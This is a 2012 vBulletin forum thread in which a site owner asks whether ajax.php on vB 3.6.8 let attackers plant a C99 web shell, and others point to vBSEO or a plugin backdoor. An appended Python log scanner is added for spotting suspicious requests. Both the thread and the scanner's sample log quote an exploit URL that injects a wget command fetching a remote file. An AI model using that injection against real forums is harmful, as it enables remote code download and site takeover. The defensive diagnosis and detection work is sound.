
z0diac 07-19-2012 01:10 AM

is ajax.php on vB 3.6.8 causing my security hole and malicious software infections?
 
I've been getting infected with malicious software daily for the last week. I've hired the good guys at Total Server Solutions and they have pointed toward ajax.php being insecure.

Is there an updated version of JUST that file that I can use with vB 3.6.8 ? I cannot do a full vB upgrade due to a lot of php file edits that have been done to create some custom stuff.

Are there any known security holes in ajax.php on my version of vB? (The !C99madShell v. 2.0 madnet edition! hack was put on)

NEED HELP with ajax.php and what I can do to it so this doesn't happen again!

Zachery 07-19-2012 01:34 AM

Not out of the box. Your third-party addons, or old version of vBulletin, may be allowing hackers access. It's also possible they got in completely unrelated to your vb site and hit your site as they were passing by.

z0diac 07-19-2012 02:10 AM

Could updating just the ajax.php file to a more recent version help secure it?

Simon Lloyd 07-19-2012 05:11 AM

It definitely won't be the ajax file, it's usually due to a poorly coded add-on allowing access, if you have all the security patches for vb up to date for your installation then it will be from something else, do you have vbseo?

Check these too:
https://www.vbulletin.com/forum/entr...Forums-(Part-1)
https://www.vbulletin.com/forum/entr...Forums-(Part-2)
https://www.vbulletin.com/docs/html/securing_vbulletin
https://vborg.vbsupport.ru/showthread.php?t=193930

z0diac 07-19-2012 02:47 PM

Quote:

Originally Posted by Simon Lloyd (Post 2349431)
It definitely won't be the ajax file, it's usually due to a poorly coded add-on allowing access, if you have all the security patches for vb up to date for your installation then it will be from something else, do you have vbseo?

Check these too:
https://www.vbulletin.com/forum/entr...Forums-(Part-1)
https://www.vbulletin.com/forum/entr...Forums-(Part-2)
https://www.vbulletin.com/docs/html/securing_vbulletin
https://vborg.vbsupport.ru/showthread.php?t=193930

Yes, I have VBSEO, although I can't even remember what it does.

It was definitely the ajax.php file in 3.6.8 - the guys at Total Server Solutions tried a test of the exploit on it and it worked. They put on a vb 4.x ajax.php file and tried the exploit, and it didn't work.

Exploit in 3.6.8 ajax.php (example):
Code:

http://forum.mydomain.com/ajax.php?global=wget%20http://www.whatever.com/images/logo2.png

Simon Lloyd 07-19-2012 03:22 PM

The exploit may well have worked on that php file, but unless your vbseo is patched up to date that's almost certainly where it was injected, there's been many threads on it, go to vbseo and check your version against the latest, they have a tool you can download to check.

kh99 07-19-2012 03:32 PM

I think you might want to check your plugins and see if you have any that use hook ajax_start or ajax_complete - the ajax.php file itself doesn't use the global parameter so something else must have been processing the command (I suppose it could have to do with vbseo - I don't know how that exploit worked).

Edit: BTW, here's an older thread discussing the issue: www.vbulletin.org/forum/showthread.php?t=202532 ...and if what was said in that thread is true, ajax.php isn't the original problem, it's just where a "back door" was added.
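
Added example, not part of any post in this thread: since kh99 notes that the stock ajax.php does not read a `global` parameter, any request to ajax.php carrying one is worth pulling out of the web server access log to date the activity and identify the clients involved. The log format (Apache combined), the sample lines and the function name are assumptions made for this sketch.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [18/Jul/2012:03:12:44 +0000] "GET /ajax.php?global=wget%20http://www.whatever.com/images/logo2.png HTTP/1.1" 200 12 "-" "curl/7.21"
203.0.113.20 - - [18/Jul/2012:03:13:02 +0000] "POST /ajax.php?do=usersearch HTTP/1.1" 200 341 "http://forum.mydomain.com/" "Mozilla/5.0"
198.51.100.7 - - [18/Jul/2012:03:14:10 +0000] "POST /ajax.php?do=x&global=test HTTP/1.1" 200 40 "-" "curl/7.21"
203.0.113.20 - - [18/Jul/2012:03:15:00 +0000] "GET /showthread.php?t=285708&global=1 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
not a log line
"""

# Captures: client IP, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_suspect_requests(log_text, script="ajax.php", param="global"):
    """Group requests to `script` that carry query parameter `param` by client IP."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, when, method, target, status = m.groups()
        url = urlsplit(target)
        if url.path.rsplit("/", 1)[-1] != script:
            continue  # the same parameter on other scripts is out of scope here
        # parse_qs percent-decodes values, so %20 shows up as a space
        params = parse_qs(url.query, keep_blank_values=True)
        if param in params:
            hits[ip].append({"time": when, "method": method,
                             "status": int(status), "value": params[param][0]})
    return dict(hits)

if __name__ == "__main__":
    for ip, reqs in find_suspect_requests(SAMPLE_LOG).items():
        for r in reqs:
            print(ip, r["time"], r["method"], r["status"], repr(r["value"]))
```

Access logs record only the query string, so a parameter sent in a POST body will not appear here. The earliest hit gives a lower bound for when the handler was present, which helps when comparing file and plugin modification times.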

